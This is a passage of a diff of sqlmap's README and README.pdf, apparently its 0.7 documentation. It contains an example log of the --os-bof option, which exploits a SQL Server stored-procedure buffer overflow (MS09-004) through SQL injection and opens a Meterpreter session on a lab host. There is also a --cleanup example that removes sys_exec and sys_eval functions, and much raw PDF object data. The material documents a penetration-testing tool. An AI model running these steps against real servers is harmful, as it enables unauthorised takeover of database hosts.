This technique is detailed on the white paper Advanced SQL injection to operating system full control.

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-bof -v 1 --msf-path /home/inquis/software/metasploit
+
+[...]
+[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' 
+stored procedure heap-based buffer overflow (MS09-004)
+[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack
+[hh:mm:14] [INFO] retrieved: 1
+[hh:mm:15] [INFO] retrieved: 1
+[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2
+[hh:mm:15] [INFO] testing if current user is DBA
+[hh:mm:15] [INFO] retrieved: 1
+[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:21] [INFO] xp_cmdshell extended procedure is available
+[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit
+which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 
+which is the back-end DBMS address? [192.168.1.131] 
+which remote port numer do you want to use? [39391] 62719
+which payload do you want to use?
+[1] Reflective Meterpreter (default)
+[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
+[3] Shell
+[4] Reflective VNC
+[5] PatchUp VNC (only from Metasploit development revision 6742)
+> 
+which payload encoding do you want to use?
+[1] No Encoder
+[2] Alpha2 Alphanumeric Mixedcase Encoder
+[3] Alpha2 Alphanumeric Uppercase Encoder
+[4] Avoid UTF8/tolower
+[5] Call+4 Dword XOR Encoder
+[6] Single-byte XOR Countdown Encoder
+[7] Variable-length Fnstenv/mov Dword XOR Encoder
+[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
+[9] Non-Alpha Encoder
+[10] Non-Upper Encoder
+[11] Polymorphic XOR Additive Feedback Encoder (default)
+[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
+[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
+> 
+[hh:mm:50] [INFO] creation in progress .................. done
+[hh:mm:08] [INFO] handling DEP
+[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to 
+handle it
+[hh:mm:08] [INFO] checking DEP system policy
+[hh:mm:09] [INFO] retrieved: OPTIN
+[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default
+[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait..
+[*] Please wait while we load the module tree...
+[*] Started bind handler
+[*] Starting the payload handler...
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719)
+
+meterpreter > Loading extension priv...success.
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > exit
+
+
+

+

5.10 Miscellaneous

@@ -4216,7 +5065,7 @@ counts the number of retrieved query output characters.

It is possible to update sqlmap to the latest stable version available on its -SourceForge File List page by running it with the +SourceForge File List page by running it with the --update option.

@@ -4233,7 +5082,7 @@ $ python sqlmap.py --update -v 4 [hh:mm:55] [TRAFFIC OUT] HTTP request: GET /doc/VERSION HTTP/1.1 Host: sqlmap.sourceforge.net -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200): @@ -4252,7 +5101,7 @@ X-Pad: avoid browser bug [hh:mm:56] [TRAFFIC OUT] HTTP request: GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1 Host: www.sqlsecurity.com -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; language=en-US Connection: close @@ -4576,8 +5425,34 @@ vulnerable parameter which is the default behaviour.

Option: --cleanup

-

This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper -Advanced SQL injection to operating system full control for the moment.

+

It is recommended to clean up the back-end database management system from +sqlmap temporary tables and created user-defined functions when you are +done with owning the underlying operating system or file system.

+ +

Example on a PostgreSQL 8.3.5 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/iis/get_int.aspx?id=1" \
+  -v 2 --cleanup
+
+[...]
+[hh:mm:18] [INFO] cleaning up the database management system
+[hh:mm:18] [DEBUG] removing support tables
+[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput
+do you want to remove sys_exec UDF? [Y/n] 
+[hh:mm:20] [DEBUG] removing sys_exec UDF
+[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text)
+do you want to remove sys_eval UDF? [Y/n] 
+[hh:mm:21] [DEBUG] removing sys_eval UDF
+[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text)
+[hh:mm:21] [INFO] database management system cleanup finished
+[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can 
+only be deleted manually
+
+
+

6. Disclaimer

diff --git a/doc/README.pdf b/doc/README.pdf index c1ef3345f..48c798dd3 100644 --- a/doc/README.pdf +++ b/doc/README.pdf @@ -370,90 +370,84 @@ endobj << /S /GoTo /D (subsubsection.5.9.1) >> endobj 252 0 obj -(Execute an operating system command) +(Execute arbitrary operating system command) endobj 253 0 obj << /S /GoTo /D (subsubsection.5.9.2) >> endobj 256 0 obj -(Prompt for an interactive operating system shell) +(Prompt for an out-of-band shell, meterpreter or VNC) endobj 257 0 obj << /S /GoTo /D (subsubsection.5.9.3) >> endobj 260 0 obj -(Prompt for an out-of-band shell, meterpreter or VNC) +(One click prompt for an out-of-band shell, meterpreter or VNC) endobj 261 0 obj << /S /GoTo /D (subsubsection.5.9.4) >> endobj 264 0 obj -(One click prompt for an out-of-band shell, meterpreter or VNC) -endobj -265 0 obj -<< /S /GoTo /D (subsubsection.5.9.5) >> -endobj -268 0 obj (Stored procedure buffer overflow exploitation) endobj -269 0 obj +265 0 obj << /S /GoTo /D (subsection.5.10) >> endobj -272 0 obj +268 0 obj (Miscellaneous) endobj -273 0 obj +269 0 obj << /S /GoTo /D (subsubsection.5.10.1) >> endobj -276 0 obj +272 0 obj (Estimated time of arrival) endobj -277 0 obj +273 0 obj << /S /GoTo /D (subsubsection.5.10.2) >> endobj -280 0 obj +276 0 obj (Update sqlmap to the latest stable version) endobj -281 0 obj +277 0 obj << /S /GoTo /D (subsubsection.5.10.3) >> endobj -284 0 obj +280 0 obj (Save and resume all data retrieved on a session file) endobj -285 0 obj +281 0 obj << /S /GoTo /D (subsubsection.5.10.4) >> endobj -288 0 obj +284 0 obj (Save options on a configuration INI file) endobj -289 0 obj +285 0 obj << /S /GoTo /D (subsubsection.5.10.5) >> endobj -292 0 obj +288 0 obj (Act in non-interactive mode) endobj -293 0 obj +289 0 obj << /S /GoTo /D (subsubsection.5.10.6) >> endobj -296 0 obj +292 0 obj (Clean up the DBMS by sqlmap specific UDF and tables) endobj -297 0 obj +293 0 obj << /S /GoTo /D (section.6) >> endobj -300 0 obj +296 0 obj (Disclaimer) endobj -301 0 obj +297 0 obj << /S /GoTo /D (section.7) >> endobj -304 0 obj +300 0 obj (Author) endobj -305 0 obj -<< /S /GoTo /D [306 0 R /Fit ] >> +301 0 obj +<< /S /GoTo /D [302 0 R /Fit ] >> endobj -339 0 obj << +335 0 obj << /Length 1438 /Filter /FlateDecode >> @@ -468,688 +462,678 @@ x *uŸ8¸?}3%Ý]G3„Ÿ]O!@wóz9ìý¿4þ endstream endobj -306 0 obj << +302 0 obj << /Type /Page -/Contents 339 0 R -/Resources 338 0 R +/Contents 335 0 R +/Resources 334 0 R /MediaBox [0 0 595.276 841.89] -/Parent 349 0 R -/Annots [ 307 0 R 308 0 R 309 0 R 310 0 R 311 0 R 312 0 R 313 0 R 314 0 R 315 0 R 316 0 R 317 0 R 318 0 R 319 0 R 320 0 R 321 0 R 322 0 R 323 0 R 324 0 R 325 0 R 326 0 R 327 0 R 328 0 R 329 0 R 330 0 R 331 0 R 332 0 R 333 0 R 334 0 R 335 0 R 336 0 R ] +/Parent 345 0 R +/Annots [ 303 0 R 304 0 R 305 0 R 306 0 R 307 0 R 308 0 R 309 0 R 310 0 R 311 0 R 312 0 R 313 0 R 314 0 R 315 0 R 316 0 R 317 0 R 318 0 R 319 0 R 320 0 R 321 0 R 322 0 R 323 0 R 324 0 R 325 0 R 326 0 R 327 0 R 328 0 R 329 0 R 330 0 R 331 0 R 332 0 R ] >> endobj -307 0 obj << +303 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] /Rect [84.837 715.552 190.43 726.342] /Subtype/Link/A<> >> endobj -308 0 obj << +304 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] /Rect [251.615 678.858 282.797 689.981] /Subtype/Link/A<> >> endobj -309 0 obj << +305 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] /Rect [368.039 678.858 411.837 689.981] /Subtype/Link/A<> >> endobj -310 0 obj << +306 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [71.004 611.458 151.087 620.326] /Subtype /Link /A << /S /GoTo /D (section.1) >> >> endobj -311 0 obj << +307 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 590.745 170.274 601.536] /Subtype /Link /A << /S /GoTo /D (subsection.1.1) >> >> endobj -312 0 obj << +308 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 573.906 147.393 582.76] /Subtype /Link /A << /S /GoTo /D (subsection.1.2) >> >> endobj -313 0 obj << +309 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 553.193 158.765 563.984] /Subtype /Link /A << /S /GoTo /D (subsection.1.3) >> >> endobj -314 0 obj << +310 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [71.004 526.393 130.31 535.261] /Subtype /Link /A << /S /GoTo /D (section.2) >> >> endobj -315 0 obj << +311 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 507.617 181.576 516.471] /Subtype /Link /A << /S /GoTo /D (subsection.2.1) >> >> endobj -316 0 obj << +312 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 488.841 204.609 497.695] /Subtype /Link /A << /S /GoTo /D (subsection.2.2) >> >> endobj -317 0 obj << +313 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 470.065 187.041 478.919] /Subtype /Link /A << /S /GoTo /D (subsection.2.3) >> >> endobj -318 0 obj << +314 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [71.004 439.391 198.218 450.196] /Subtype /Link /A << /S /GoTo /D (section.3) >> >> endobj -319 0 obj << +315 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [71.004 410.655 197.445 421.46] /Subtype /Link /A << /S /GoTo /D (section.4) >> >> endobj -320 0 obj << +316 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [71.004 381.919 117.812 392.723] /Subtype /Link /A << /S /GoTo /D (section.5) >> >> endobj -321 0 obj << +317 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 363.142 185.906 373.933] /Subtype /Link /A << /S /GoTo /D (subsection.5.1) >> >> endobj -322 0 obj << +318 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 344.366 139.37 355.157] /Subtype /Link /A << /S /GoTo /D (subsection.5.2) >> >> endobj -323 0 obj << +319 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 325.59 195.59 336.381] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.2.1) >> >> endobj -324 0 obj << +320 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 306.814 332.847 317.605] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.2.2) >> >> endobj -325 0 obj << +321 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 288.038 324.616 298.828] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.2.3) >> >> endobj -326 0 obj << +322 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 269.261 325.571 280.052] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.2.4) >> >> endobj -327 0 obj << +323 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 250.485 145.623 261.276] /Subtype /Link /A << /S /GoTo /D (subsection.5.3) >> >> endobj -328 0 obj << +324 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 233.646 266.916 242.5] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.1) >> >> endobj -329 0 obj << +325 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 214.869 238.17 223.723] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.2) >> >> endobj -330 0 obj << +326 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 196.093 243.399 204.947] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.3) >> >> endobj -331 0 obj << +327 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 175.104 259.086 186.171] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.4) >> >> endobj -332 0 obj << +328 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 158.541 235.514 167.395] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.5) >> >> endobj -333 0 obj << +329 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 137.551 324.934 148.619] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.6) >> >> endobj -334 0 obj << +330 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 119.052 199.325 129.842] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.7) >> >> endobj -335 0 obj << +331 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 100.276 262.296 111.066] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.8) >> >> endobj -336 0 obj << +332 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 81.499 342.669 92.29] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.9) >> >> endobj -340 0 obj << -/D [306 0 R /XYZ 72 793.935 null] +336 0 obj << +/D [302 0 R /XYZ 72 793.935 null] >> endobj -341 0 obj << -/D [306 0 R /XYZ 72 760.449 null] +337 0 obj << +/D [302 0 R /XYZ 72 760.449 null] >> endobj -346 0 obj << -/D [306 0 R /XYZ 72 631.328 null] +342 0 obj << +/D [302 0 R /XYZ 72 631.328 null] >> endobj -338 0 obj << -/Font << /F17 342 0 R /F15 343 0 R /F18 344 0 R /F20 345 0 R /F21 347 0 R /F22 348 0 R >> +334 0 obj << +/Font << /F17 338 0 R /F15 339 0 R /F18 340 0 R /F20 341 0 R /F21 343 0 R /F22 344 0 R >> /ProcSet [ /PDF /Text ] >> endobj -389 0 obj << -/Length 1508 +385 0 obj << +/Length 1523 /Filter /FlateDecode >> stream -xÚí[Év›HÝë+X¢sZ„ ¨e{J''±Ké^8Y`T²éfP<ü} -ª@b±°NÚŠØ3 tïn½÷¤+·Š®¼ý¾Õ ¨ªk€RÅñG×ßueÎTt SKyȯòlZ|ë)ÓÑ—ÑÑlôî …jÔ„¦2[ˆÏ@E†2›+×êñÅùìô|6Ÿ}|wŒµK±‰4òÏÊ/„Ù#]¾”x¡èV¾ÙÕû‘2ÁÐÐü¤aLÅm††4 '&Æê”9a0Ç„š„Ù«ch©¶›ˆ£7ã ße‹0bò2×ga*ÏòÛæ$nT^F¹ž HUm<Á4ߺþk6=ŸW{yUa'Àº2–Fˆ¹†,È~¶]?2õRÁ’l‡’FâD¸Ûˆ%‘Ë$w,l$w÷¿f³ËèëŒÄõoaYÖ΀íÐBê´O€¡ú!øwƒñPãÈ^?¯AÔUˆºÈÛÀÆ-nâ³±…T'ö'MtiG¶Ï}Ó =æ@ýÑÄD‡Êh«¡­C Ö Äÿ,Ã?Œœ".bnsJìXîùv`ß2Ÿ‡sSâ§8aE\âŒ5ÜÏ"ošV(ñK¡$+(ÑN¡ —2°Û‰ÜŠcPü+A2zØ– §qʯ░[:~–Ýž¼Ðž7<Ðà É;Ãܘ_æZì–‰ßç!Ö› ÓÄdÈx]ÏìA„)‰8}t¼t.yˆ¥£;î7a§ðM"B°\ó% ®¸òùµJ«ОJÑJQh 'ƒõ.p¤¬!v)AƒH|̓Z]†n%ËÌj4D¢ð ¾Š””Ø9™ÿeÂæâ §uµÊ$¤X@y‰»,&? ÔÄÎR*P¥ ¡)N§KášaÔâvôÿã­ŸS4â‘QŠ¿ ¸fKA¹nç²e.4Êçâé—Oõ^Ï×Ú?coƒé=àEÏÃûõüÃÅùÊXŸ¾Ý "ö=ž´B z@\Èɯq]m—èâº/1YD­}è­èö-¯˜2ižñU‹–‘+,õòC±„îÚ%Œ~Ó,3æé#ޱ{ŸqÆ„7t-C«ËÌL“®ˆo ¢·\é†pƒÝi÷§(¼æ ñf¸ :ÔàÎT ¢ýꈤ4ø#;XÔ`É2&vàLÛ‹LRŠÌã4Š*Õ®4n! -ÁÁ¶*D`½'h'er¨= -#csÞñr&ÈŠ‰BÀž°„ëQ©M-ËO}žÊjP•0$œ(¿È•k]»­ÚlÏ}7pã„'±°átd‡­½VZvf·ÆJîGÍ¢Íë lÔ­Ö zðcVø‘•Ì8~È”cɲÁß5Kn˜‚!Õ¾~ÒäÞ»»mÜ€ƒ/¼ ؃ K’ñ瘆z?6LÕv½U»Ð b %1©À=’,-’l ¹È¯ øMŠÓ•¼Q̉T”ÉÚćz©4!˜´[MŸô]ޤþ²) ñ:üRWæ]“zuƒ‹ùV´amÛó*°g-'6j¼܉?$0¿dô‘< įR9=ò”kÍ´˜‡Ì }Šâ†þ§²i˜¬êž¢¦õ;ÿVôÑv…Ò2½Zeƒ ì«®ÕmÇaqK k´^,õ,ZeôŠÙóJ¡ «ð{2,¢b&«ì£ÝÈÞú„ó²ÁØTì¬î.y¯çDö`½el_Ú´ÊÒæ?Yƒ7rVÖ óéÇöê@ó¸ÔJ¾0y'ô};hÌxRø›èl½T¥eH¹ä‘xYÁ%À²Ïv’µÞn×Ð0Vã;ÆõhcŒžìÁƒ¹½:¤eŸãY4Ã4™„‹É]DÞ¥?d<ûÂ2ÊþÊ«åÝŸ7"ƒßÐÄ]fÕíélôöò +xÚí[Év›HÝë+X¢sZ„ ¨eDZÓÉIl'RºIeT¶éfP<ü}ª¨‰A-‹¨ÓvÌF˜I {ßpß«gÛ¸2lãõäÛˆ­mƒ@ƒPÛ”~4ùüÕ6–âø[ö0õŒÛòªÈÀ®'¶¡1Ÿ|˜¼\L^œ@`P‹ºÐ5—ê;E‘c,–Ægóèìtq|º˜O¿.Þ¾8ÎÆ¥ØE– Åw•ByÅÄÖ/¥^(½ÒoöñõĘaèX€ñ²0¦ê6ÇB°§3csÎý$^fÓBÈÌ¹Åæíz& ruôb:»ü2I¹¾,ˆxRè³âö˜ûyÄ—1>Ϥ¦5aZnÛþ9›Ïk½<€šp'À¶1žEˆ»,PȾgwA$,"…T<…DîˆCÒTH.Õ6åypÍÅí5ùµÆýÅâ¼ú&#YûWxžw0`‡4ƒÐ¢6mħ3`Ch¾‰ÿÞb<Ôydò¤Ÿ×!Ú&D»ÈÛÂ%,aâ‹©‡Lžåì"Ô&ºb)‹xÎÓ/¶cgâ´M\ô\íõ ´wˆÁÔøŸHü“Ô¯âr(–LPÂ2½±˜]ñH„srS²û,çU\ŒuÜÏ#š^(ñC¡$k(ÑA¡LV:°³<ˆ¯Ô±Pü3ArØÖ YžèŸÔ‘[;¾Ìn÷a–ôù„äƒaîhÌÏK-vūĉdÝ„éb2f¼]Ï@„«‰8¾óÃb©yÈ´£ûÁa¿ò5M*BðRó宄òù…µJ¯ÐJÑÑJQi _Âzß +Þ»” Q$þȃz]†î%ëÌêtD¢ò QEjÊYIæ?ÒCøR´®+ )!UæÁªR˜â$0s&S*0µ)¡©N+åšIÚãvôÿãm˜Stâ‘S‹¿-¸ÊRP×íB¶,•F¹ƒXC<ÿð®ÀÛùÚAOÏØûàEöxÑ¿ÃûéôÍÙéÚXï¾»AE<õxÒ 1q%'?emµ]£‹×è>Ädõžz@ïEwh{ÅÕIóDT!<]¥.XÚí!Æf =´K8Ã2¦[gÌã;!³àFrÆ•7ì*C›e¦Ô¤kâ{(‚è17EvC¸ÅûãX5^ËB¼.¨MF5x0ƒè°>"© þ%‹cžvXòœ‘‰8Óþ"“Ô"ó¨HÓF·«ÈzˆBpô£½ØÀ ÚÆIZÂÈÃÜïx8dÍD%`_ñ\èQ­M/ZVœ|ù~®»AMÂr¢ò¢@׺¬¯ÛÌ–QY.’XÒq:rÀ¥½^Zf·ÎZî§Ý¦Í-4½ò”U“ å+iñ&­wƒ;?‰"/»3ÃøÉÍ »pïÊ”Öä\ÞUs@›L‰¤ÈgÉåì‚U¡!»æaø›^À•#ò«T~ê«õÝžuÿ‡?¢‘0‰Ùþ% ­/Îâªn =ÿUþðUK´ Kü,Q–Nc +ç¿Vg¤D›ÛãÅä;Ýÿù> endstream endobj -388 0 obj << +384 0 obj << /Type /Page -/Contents 389 0 R -/Resources 387 0 R +/Contents 385 0 R +/Resources 383 0 R /MediaBox [0 0 595.276 841.89] -/Parent 349 0 R -/Annots [ 337 0 R 350 0 R 351 0 R 352 0 R 353 0 R 354 0 R 355 0 R 356 0 R 357 0 R 358 0 R 359 0 R 360 0 R 361 0 R 362 0 R 363 0 R 364 0 R 365 0 R 366 0 R 367 0 R 368 0 R 369 0 R 370 0 R 371 0 R 372 0 R 373 0 R 374 0 R 375 0 R 376 0 R 377 0 R 378 0 R 379 0 R 380 0 R 381 0 R 382 0 R 383 0 R 384 0 R 385 0 R ] +/Parent 345 0 R +/Annots [ 333 0 R 346 0 R 347 0 R 348 0 R 349 0 R 350 0 R 351 0 R 352 0 R 353 0 R 354 0 R 355 0 R 356 0 R 357 0 R 358 0 R 359 0 R 360 0 R 361 0 R 362 0 R 363 0 R 364 0 R 365 0 R 366 0 R 367 0 R 368 0 R 369 0 R 370 0 R 371 0 R 372 0 R 373 0 R 374 0 R 375 0 R 376 0 R 377 0 R 378 0 R 379 0 R 380 0 R 381 0 R ] >> endobj -337 0 obj << +333 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 749.49 327.895 758.344] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.10) >> >> endobj -350 0 obj << +346 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 730.714 430.789 739.568] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.3.11) >> >> endobj -351 0 obj << +347 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 710.001 149.026 720.792] /Subtype /Link /A << /S /GoTo /D (subsection.5.4) >> >> endobj -352 0 obj << +348 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 690.672 238.336 702.624] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.4.1) >> >> endobj -353 0 obj << +349 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 672.449 342.807 683.239] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.4.2) >> >> endobj -354 0 obj << +350 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 653.672 420.414 664.463] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.4.3) >> >> endobj -355 0 obj << +351 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 634.896 254.272 645.687] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.4.4) >> >> endobj -356 0 obj << +352 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 616.12 216.257 626.911] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.4.5) >> >> endobj -357 0 obj << +353 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 597.344 270.734 608.135] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.4.6) >> >> endobj -358 0 obj << +354 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 578.568 158.765 589.358] /Subtype /Link /A << /S /GoTo /D (subsection.5.5) >> >> endobj -359 0 obj << +355 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 559.238 379.134 571.191] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.5.1) >> >> endobj -360 0 obj << +356 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 541.015 315.915 551.806] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.5.2) >> >> endobj -361 0 obj << +357 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 522.239 304.82 533.03] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.5.3) >> >> endobj -362 0 obj << +358 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 503.463 303.962 514.253] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.5.4) >> >> endobj -363 0 obj << +359 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 484.687 160.286 495.477] /Subtype /Link /A << /S /GoTo /D (subsection.5.6) >> >> endobj -364 0 obj << +360 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 465.91 366.684 476.701] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.6.1) >> >> endobj -365 0 obj << +361 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [85.944 449.071 167.176 457.925] /Subtype /Link /A << /S /GoTo /D (subsection.5.7) >> >> endobj -366 0 obj << +362 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 430.295 174.148 439.149] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.1) >> >> endobj -367 0 obj << +363 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 411.518 197.914 420.372] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.2) >> >> endobj -368 0 obj << +364 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 392.742 218.36 401.596] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.3) >> >> endobj -369 0 obj << +365 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 373.966 408.545 382.82] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.4) >> >> endobj -370 0 obj << +366 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 355.19 166.373 364.044] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.5) >> >> endobj -371 0 obj << +367 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 334.477 241.047 345.268] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.6) >> >> endobj -372 0 obj << +368 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 315.701 210.447 326.491] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.7) >> >> endobj -373 0 obj << +369 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 298.861 227.49 307.715] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.8) >> >> endobj -374 0 obj << +370 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 280.085 215.787 288.939] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.9) >> >> endobj -375 0 obj << +371 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 261.309 246.719 270.163] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.10) >> >> endobj -376 0 obj << +372 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 240.596 268.05 251.387] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.11) >> >> endobj -377 0 obj << +373 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 221.82 289.741 232.61] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.12) >> >> endobj -378 0 obj << +374 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[1 0 0] /Rect [108.853 203.043 273.667 213.834] /Subtype /Link /A << /S /GoTo /D (subsubsection.5.7.13) >> >> 